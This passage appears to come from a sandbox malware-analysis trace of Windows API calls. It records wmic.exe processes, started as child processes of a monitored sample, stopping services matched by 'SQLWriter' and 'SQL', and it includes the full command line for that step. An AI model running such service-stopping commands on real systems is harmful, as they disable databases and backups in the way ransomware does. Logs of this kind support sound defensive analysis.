ppOutSignature=0x26d4e8*=0x1ddc4a0) returned 0x0 [0246.242] lstrlenW (lpString="Delete") returned 6 [0246.242] lstrlenW (lpString="stopservice") returned 11 [0246.242] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0246.242] IUnknown:Release (This=0x1ddc4a0) returned 0x0 [0246.242] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*="GetSecurityDescriptor", ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x1ddc640) returned 0x0 [0246.242] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0246.242] lstrlenW (lpString="stopservice") returned 11 [0246.242] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0246.242] IUnknown:Release (This=0x1ddc640) returned 0x0 [0246.242] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*="SetSecurityDescriptor", ppInSignature=0x26d4e0*=0x1ddc520, ppOutSignature=0x26d4e8*=0x1ddca20) returned 0x0 [0246.242] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0246.242] lstrlenW (lpString="stopservice") returned 11 [0246.242] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0246.242] IUnknown:Release (This=0x1ddc520) returned 0x0 [0246.242] IUnknown:Release (This=0x1ddca20) returned 0x0 [0246.242] IWbemClassObject:NextMethod (in: This=0x1ddbfa0, lFlags=0, pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0 | out: pstrName=0x26d4d8*=0x0, ppInSignature=0x26d4e0*=0x0, ppOutSignature=0x26d4e8*=0x0) returned 0x40005 [0246.242] IUnknown:Release (This=0x1ddbfa0) returned 0x0 [0246.242] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0246.242] lstrlenW (lpString="SET") returned 3 [0246.242] lstrlenW (lpString="call") returned 4 [0246.242] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0246.243] lstrlenW (lpString="CREATE") returned 6 [0246.243] lstrlenW (lpString="call") returned 4 [0246.243] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0246.243] free (_Block=0x358640) [0246.243] malloc (_Size=0x8) returned 0x35cf60 [0246.243] lstrlenW (lpString="GET") returned 3 [0246.243] lstrlenW (lpString="call") returned 4 [0246.243] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0246.243] lstrlenW (lpString="LIST") returned 4 [0246.243] lstrlenW (lpString="call") returned 4 [0246.243] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0246.243] lstrlenW (lpString="ASSOC") returned 5 [0246.243] lstrlenW (lpString="call") returned 4 [0246.243] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0246.243] WbemLocator:IUnknown:AddRef (This=0x1da1390) returned 0x3 [0246.243] free (_Block=0x356a60) [0246.243] lstrlenW (lpString="") returned 0 [0246.243] lstrlenW (lpString="XDUWTFONO") returned 9 [0246.243] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0246.243] lstrlenW (lpString="XDUWTFONO") returned 9 [0246.243] malloc (_Size=0x14) returned 0x35cc80 [0246.243] lstrlenW (lpString="XDUWTFONO") returned 9 [0246.243] GetCurrentThreadId () returned 0xbc0 [0246.243] GetCurrentProcess () returned 0xffffffffffffffff [0246.243] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x26f820 | out: TokenHandle=0x26f820*=0x298) returned 1 [0246.243] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26f818 | out: TokenInformation=0x0, ReturnLength=0x26f818) returned 0 [0246.243] malloc (_Size=0x118) returned 0x35cf80 [0246.243] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x35cf80, TokenInformationLength=0x118, ReturnLength=0x26f818 | out: TokenInformation=0x35cf80, ReturnLength=0x26f818) returned 1 [0246.244] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x35cf80*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1945858798, Attributes=0xd5e6), (Luid.LowPart=0x0, Luid.HighPart=3500640, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=3473752, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x1000d5fb), (Luid.LowPart=0x0, Luid.HighPart=3526496, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0246.244] free (_Block=0x35cf80) [0246.244] CloseHandle (hObject=0x298) returned 1 [0246.244] lstrlenW (lpString="GET") returned 3 [0246.244] lstrlenW (lpString="call") returned 4 [0246.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0246.244] lstrlenW (lpString="LIST") returned 4 [0246.244] lstrlenW (lpString="call") returned 4 [0246.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0246.244] lstrlenW (lpString="SET") returned 3 [0246.244] lstrlenW (lpString="call") returned 4 [0246.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0246.244] lstrlenW (lpString="CALL") returned 4 [0246.244] lstrlenW (lpString="call") returned 4 [0246.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0246.244] ??0CHString@@QEAA@XZ () returned 0x26f7d0 [0246.244] GetCurrentThreadId () returned 0xbc0 [0246.244] malloc (_Size=0x18) returned 0x35cca0 [0246.244] malloc (_Size=0x18) returned 0x35ccc0 [0246.244] malloc (_Size=0x18) returned 0x35cce0 [0246.244] malloc (_Size=0x18) returned 0x35cd00 [0246.245] malloc (_Size=0x18) returned 0x35d550 [0246.245] SysStringLen (param_1="\\\\") returned 0x2 [0246.245] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0246.245] malloc (_Size=0x18) returned 0x35d570 [0246.245] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0246.245] SysStringLen (param_1="\\") returned 0x1 [0246.245] malloc (_Size=0x18) returned 0x35d590 [0246.245] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0246.245] SysStringLen (param_1="root\\cimv2") returned 0xa [0246.245] free (_Block=0x35d570) [0246.245] free (_Block=0x35d550) [0246.245] free (_Block=0x35cd00) [0246.245] free (_Block=0x35cce0) [0246.245] free (_Block=0x35ccc0) [0246.245] free (_Block=0x35cca0) [0246.245] malloc (_Size=0x18) returned 0x35cca0 [0246.245] malloc (_Size=0x18) returned 0x35ccc0 [0246.245] malloc (_Size=0x18) returned 0x35cce0 [0246.245] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1da1390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffc629d0 | out: ppNamespace=0xffc629d0*=0x1db3b28) returned 0x0 [0246.250] free (_Block=0x35cce0) [0246.250] free (_Block=0x35ccc0) [0246.250] free (_Block=0x35cca0) [0246.250] CoSetProxyBlanket (pProxy=0x1db3b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0246.251] free (_Block=0x35d590) [0246.251] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0246.251] ??0CHString@@QEAA@XZ () returned 0x26f578 [0246.251] GetCurrentThreadId () returned 0xbc0 [0246.251] malloc (_Size=0x70) returned 0x35cf80 [0246.251] malloc (_Size=0x50) returned 0x35d000 [0246.251] malloc (_Size=0x50) returned 0x35d060 [0246.251] malloc (_Size=0x70) returned 0x35d0c0 [0246.251] malloc (_Size=0x70) returned 0x35d140 [0246.251] malloc (_Size=0x48) returned 0x35d1c0 [0246.251] malloc (_Size=0x18) returned 0x35cca0 [0246.251] lstrlenA (lpString="") returned 0 [0246.251] malloc (_Size=0x2) returned 0x356a60 [0246.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffbf314c, cbMultiByte=-1, lpWideCharStr=0x356a60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0246.251] free (_Block=0x356a60) [0246.251] malloc (_Size=0x70) returned 0x35d210 [0246.251] malloc (_Size=0x48) returned 0x35d290 [0246.251] malloc (_Size=0x18) returned 0x35ccc0 [0246.251] free (_Block=0x35cca0) [0246.251] IWbemServices:GetObject (in: This=0x1db3b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x26f5a8*=0x0, ppCallResult=0x0 | out: ppObject=0x26f5a8*=0x1ddc030, ppCallResult=0x0) returned 0x0 [0246.275] malloc (_Size=0x18) returned 0x35cca0 [0246.275] IWbemClassObject:GetMethod (in: This=0x1ddc030, wszName="stopservice", lFlags=0, ppInSignature=0x26f5a0, ppOutSignature=0x26f5b8 | out: ppInSignature=0x26f5a0*=0x0, ppOutSignature=0x26f5b8*=0x1ddc530) returned 0x0 [0246.275] free (_Block=0x35cca0) [0246.275] IUnknown:Release (This=0x1ddc530) returned 0x0 [0246.275] IUnknown:Release (This=0x1ddc030) returned 0x0 [0246.275] ??0CHString@@QEAA@XZ () returned 0x26f3c0 [0246.275] GetCurrentThreadId () returned 0xbc0 [0246.275] malloc (_Size=0x18) returned 0x35cca0 [0246.275] lstrlenA (lpString="") returned 0 [0246.276] malloc (_Size=0x2) returned 0x356a60 [0246.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffbf314c, cbMultiByte=-1, lpWideCharStr=0x356a60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0246.276] free (_Block=0x356a60) [0246.276] malloc (_Size=0x18) returned 0x35cce0 [0246.276] lstrlenA (lpString="") returned 0 [0246.276] malloc (_Size=0x2) returned 0x356a60 [0246.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffbf314c, cbMultiByte=-1, lpWideCharStr=0x356a60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0246.276] free (_Block=0x356a60) [0246.276] malloc (_Size=0x18) returned 0x35cd00 [0246.276] free (_Block=0x35cce0) [0246.276] malloc (_Size=0x18) returned 0x35cce0 [0246.276] lstrlenA (lpString="SELECT * FROM ") returned 14 [0246.276] malloc (_Size=0x1e) returned 0x35d2e0 [0246.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffbf4a40, cbMultiByte=-1, lpWideCharStr=0x35d2e0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0246.277] free (_Block=0x35d2e0) [0246.277] malloc (_Size=0x18) returned 0x35d550 [0246.277] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0246.277] SysStringLen (param_1="Win32_Service") returned 0xd [0246.277] free (_Block=0x35cce0) [0246.277] malloc (_Size=0x18) returned 0x35cce0 [0246.277] malloc (_Size=0x18) returned 0x35d570 [0246.277] lstrlenA (lpString=" WHERE ") returned 7 [0246.277] malloc (_Size=0x10) returned 0x35d590 [0246.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffbf3e20, cbMultiByte=-1, lpWideCharStr=0x35d590, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0246.277] free (_Block=0x35d590) [0246.277] malloc (_Size=0x18) returned 0x35d590 [0246.277] SysStringLen (param_1=" WHERE ") returned 0x7 [0246.277] SysStringLen (param_1="name like '%%SQLWriter%%'") returned 0x19 [0246.277] malloc (_Size=0x18) returned 0x35d5b0 [0246.277] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0246.277] SysStringLen (param_1=" WHERE name like '%%SQLWriter%%'") returned 0x20 [0246.278] free (_Block=0x35d550) [0246.278] free (_Block=0x35d590) [0246.278] free (_Block=0x35d570) [0246.278] free (_Block=0x35cce0) [0246.278] malloc (_Size=0x18) returned 0x35cce0 [0246.278] IWbemServices:ExecQuery (in: This=0x1db3b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%SQLWriter%%'", lFlags=48, pCtx=0x0, ppEnum=0x26f3a8 | out: ppEnum=0x26f3a8*=0x1db3c28) returned 0x0 [0246.282] free (_Block=0x35cce0) [0246.282] CoSetProxyBlanket (pProxy=0x1db3c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0246.285] IEnumWbemClassObject:Next (in: This=0x1db3c28, lTimeout=-1, uCount=0x1, apObjects=0x26f3b0, puReturned=0x26f538 | out: apObjects=0x26f3b0*=0x0, puReturned=0x26f538*=0x0) returned 0x1 [0247.166] IUnknown:Release (This=0x1db3c28) returned 0x0 [0247.168] free (_Block=0x35d5b0) [0247.168] free (_Block=0x35cd00) [0247.168] free (_Block=0x35cca0) [0247.168] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0247.168] free (_Block=0x35ccc0) [0247.168] free (_Block=0x35d1c0) [0247.168] free (_Block=0x35d140) [0247.168] free (_Block=0x35d0c0) [0247.168] free (_Block=0x35d060) [0247.168] free (_Block=0x35d000) [0247.168] free (_Block=0x35d290) [0247.168] free (_Block=0x35d210) [0247.168] free (_Block=0x35cf80) [0247.168] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0247.168] GetCurrentThreadId () returned 0xbc0 [0247.169] ??0CHString@@QEAA@PEBG@Z () returned 0x26f8c8 [0247.169] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x26f8c8 [0247.169] malloc (_Size=0x800) returned 0x35dd20 [0247.169] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x35dd20, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0247.169] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0247.169] malloc (_Size=0x1c) returned 0x35cf80 [0247.169] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x35cf80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0247.169] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0247.169] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0247.170] free (_Block=0x35cf80) [0247.170] free (_Block=0x35dd20) [0247.170] ??1CHString@@QEAA@XZ () returned 0x5efb7201 [0247.170] WbemLocator:IUnknown:Release (This=0x1db3b28) returned 0x0 [0247.170] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0247.170] _kbhit () returned 0x0 [0247.171] free (_Block=0x35cf60) [0247.172] free (_Block=0x35cb00) [0247.172] free (_Block=0x35cae0) [0247.172] free (_Block=0x35cac0) [0247.172] free (_Block=0x35caa0) [0247.172] free (_Block=0x35cdc0) [0247.172] free (_Block=0x357150) [0247.172] free (_Block=0x35cf00) [0247.172] free (_Block=0x358680) [0247.172] free (_Block=0x35cba0) [0247.172] free (_Block=0x35cbc0) [0247.172] free (_Block=0x356eb0) [0247.172] free (_Block=0x35d4d0) [0247.172] free (_Block=0x35cbe0) [0247.172] free (_Block=0x35cc40) [0247.172] free (_Block=0x35d450) [0247.172] free (_Block=0x35d3d0) [0247.172] free (_Block=0x35cc20) [0247.172] free (_Block=0x35cc00) [0247.172] free (_Block=0x35cc60) [0247.172] free (_Block=0x35d370) [0247.172] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0247.172] free (_Block=0x35ce60) [0247.173] free (_Block=0x35cb40) [0247.173] free (_Block=0x35cf30) [0247.173] free (_Block=0x35cb80) [0247.173] free (_Block=0x358600) [0247.173] free (_Block=0x35cb60) [0247.173] free (_Block=0x35cb20) [0247.173] free (_Block=0x357f80) [0247.173] free (_Block=0x356990) [0247.173] free (_Block=0x3569e0) [0247.173] free (_Block=0x35cc80) [0247.173] free (_Block=0x356ad0) [0247.173] free (_Block=0x356e90) [0247.173] free (_Block=0x358040) [0247.173] free (_Block=0x356e70) [0247.173] free (_Block=0x358000) [0247.173] free (_Block=0x356e10) [0247.173] free (_Block=0x356e30) [0247.173] free (_Block=0x356cf0) [0247.173] free (_Block=0x356d10) [0247.173] free (_Block=0x356c90) [0247.173] free (_Block=0x356cb0) [0247.173] free (_Block=0x356d50) [0247.173] free (_Block=0x356d70) [0247.174] free (_Block=0x356db0) [0247.174] free (_Block=0x356dd0) [0247.174] free (_Block=0x356bd0) [0247.174] free (_Block=0x356bf0) [0247.174] free (_Block=0x356b70) [0247.174] free (_Block=0x356b90) [0247.174] free (_Block=0x356c30) [0247.174] free (_Block=0x356c50) [0247.174] free (_Block=0x356b10) [0247.174] free (_Block=0x356b30) [0247.174] free (_Block=0x356a80) [0247.174] free (_Block=0x356a30) [0247.174] free (_Block=0x35cd30) [0247.174] WbemLocator:IUnknown:Release (This=0x1da1390) returned 0x2 [0247.174] WbemLocator:IUnknown:Release (This=0x1db3a98) returned 0x0 [0247.175] WbemLocator:IUnknown:Release (This=0x1da1390) returned 0x1 [0247.175] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0247.175] WbemLocator:IUnknown:Release (This=0x1da1390) returned 0x0 [0247.175] free (_Block=0x35ca20) [0247.175] free (_Block=0x35ca40) [0247.175] free (_Block=0x358540) [0247.175] free (_Block=0x35ca60) [0247.175] free (_Block=0x35ca80) [0247.175] free (_Block=0x358580) [0247.175] free (_Block=0x35c8a0) [0247.175] free (_Block=0x35c8c0) [0247.175] free (_Block=0x3583c0) [0247.175] free (_Block=0x35c8e0) [0247.175] free (_Block=0x35c900) [0247.175] free (_Block=0x358400) [0247.175] free (_Block=0x35c820) [0247.175] free (_Block=0x35c840) [0247.175] free (_Block=0x358340) [0247.175] free (_Block=0x35c860) [0247.176] free (_Block=0x35c880) [0247.176] free (_Block=0x358380) [0247.176] free (_Block=0x35c9a0) [0247.176] free (_Block=0x35c9c0) [0247.176] free (_Block=0x3584c0) [0247.176] free (_Block=0x35c9e0) [0247.176] free (_Block=0x35ca00) [0247.176] free (_Block=0x358500) [0247.176] free (_Block=0x35c7a0) [0247.176] free (_Block=0x35c7c0) [0247.176] free (_Block=0x3582c0) [0247.176] free (_Block=0x35c7e0) [0247.176] free (_Block=0x35c800) [0247.176] free (_Block=0x358300) [0247.176] free (_Block=0x35c920) [0247.176] free (_Block=0x35c940) [0247.176] free (_Block=0x358440) [0247.176] free (_Block=0x35c960) [0247.176] free (_Block=0x35c980) [0247.176] free (_Block=0x358480) [0247.177] free (_Block=0x35c6e0) [0247.177] free (_Block=0x35c700) [0247.177] free (_Block=0x358200) [0247.177] free (_Block=0x35c5a0) [0247.177] free (_Block=0x35c5c0) [0247.177] free (_Block=0x3580c0) [0247.177] free (_Block=0x35c560) [0247.177] free (_Block=0x35c580) [0247.177] free (_Block=0x358080) [0247.177] free (_Block=0x35c620) [0247.177] free (_Block=0x35c640) [0247.177] free (_Block=0x358140) [0247.177] free (_Block=0x35c720) [0247.178] free (_Block=0x35c740) [0247.178] free (_Block=0x358240) [0247.178] free (_Block=0x35c5e0) [0247.178] free (_Block=0x35c600) [0247.178] free (_Block=0x358100) [0247.178] free (_Block=0x35c660) [0247.178] free (_Block=0x35c680) [0247.178] free (_Block=0x358180) [0247.178] free (_Block=0x35c6a0) [0247.178] free (_Block=0x35c6c0) [0247.178] free (_Block=0x3581c0) [0247.178] free (_Block=0x35c760) [0247.179] free (_Block=0x35c780) [0247.179] free (_Block=0x358280) [0247.179] CoUninitialize () [0247.216] exit (_Code=0) [0247.217] free (_Block=0x356f00) [0247.217] free (_Block=0x357f40) [0247.217] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0247.217] free (_Block=0x356ff0) [0247.217] free (_Block=0x356af0) [0247.217] free (_Block=0x357f00) [0247.217] free (_Block=0x357ec0) [0247.217] free (_Block=0x357e70) [0247.217] free (_Block=0x357e30) [0247.217] free (_Block=0x355ac0) [0247.217] free (_Block=0x357db0) [0247.217] free (_Block=0x355a80) [0247.217] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0247.217] free (_Block=0x3585c0) Thread: id = 168 os_tid = 0xbb8 Thread: id = 169 os_tid = 0x5c4 Thread: id = 170 os_tid = 0x758 Thread: id = 171 os_tid = 0xbb0 Thread: id = 172 os_tid = 0xb98 Process: id = "20" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x4a34e000" os_pid = "0xb78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQL%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 174 os_tid = 0x890 [0247.385] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f9b0 | out: lpSystemTimeAsFileTime=0x26f9b0*(dwLowDateTime=0xa9286030, dwHighDateTime=0x1d61d49)) [0247.385] GetCurrentProcessId () returned 0xb78 [0247.385] GetCurrentThreadId () returned 0x890 [0247.385] GetTickCount () returned 0x11679f1 [0247.385] QueryPerformanceCounter (in: lpPerformanceCount=0x26f9b8 | out: lpPerformanceCount=0x26f9b8*=36755879574) returned 1 [0247.386] GetModuleHandleW (lpModuleName=0x0) returned 0xff320000 [0247.386] __set_app_type (_Type=0x1) [0247.386] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff36ced0) returned 0x0 [0247.386] __wgetmainargs (in: _Argc=0xff392380, _Argv=0xff392390, _Env=0xff392388, _DoWildCard=0, _StartInfo=0xff39239c | out: _Argc=0xff392380, _Argv=0xff392390, _Env=0xff392388) returned 0 [0247.387] ??0CHString@@QEAA@XZ () returned 0xff392ab0 [0247.387] malloc (_Size=0x30) returned 0x3b5a80 [0247.387] malloc (_Size=0x70) returned 0x3b7d80 [0247.387] malloc (_Size=0x50) returned 0x3b5ac0 [0247.387] malloc (_Size=0x30) returned 0x3b7e00 [0247.387] malloc (_Size=0x48) returned 0x3b7e40 [0247.387] malloc (_Size=0x30) returned 0x3b7e90 [0247.387] malloc (_Size=0x30) returned 0x3b7ed0 [0247.387] ??0CHString@@QEAA@XZ () returned 0xff392f58 [0247.387] malloc (_Size=0x30) returned 0x3b7f10 [0247.387] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0247.387] SetConsoleCtrlHandler (HandlerRoutine=0xff365724, Add=1) returned 1 [0247.387] _onexit (_Func=0xff37f378) returned 0xff37f378 [0247.388] _onexit (_Func=0xff37f490) returned 0xff37f490 [0247.388] _onexit (_Func=0xff37f4d0) returned 0xff37f4d0 [0247.388] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0247.388] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0247.392] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0247.402] CoCreateInstance (in: rclsid=0xff3273a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff327370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff392940 | out: ppv=0xff392940*=0x1d21390) returned 0x0 [0247.411] GetCurrentProcess () returned 0xffffffffffffffff [0247.411] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x26f780 | out: TokenHandle=0x26f780*=0xf4) returned 1 [0247.411] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26f778 | out: TokenInformation=0x0, ReturnLength=0x26f778) returned 0 [0247.411] malloc (_Size=0x118) returned 0x3b6960 [0247.411] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x3b6960, TokenInformationLength=0x118, ReturnLength=0x26f778 | out: TokenInformation=0x3b6960, ReturnLength=0x26f778) returned 1 [0247.411] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x3b6960*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1381656434, Attributes=0x2d45), (Luid.LowPart=0x0, Luid.HighPart=3899216, 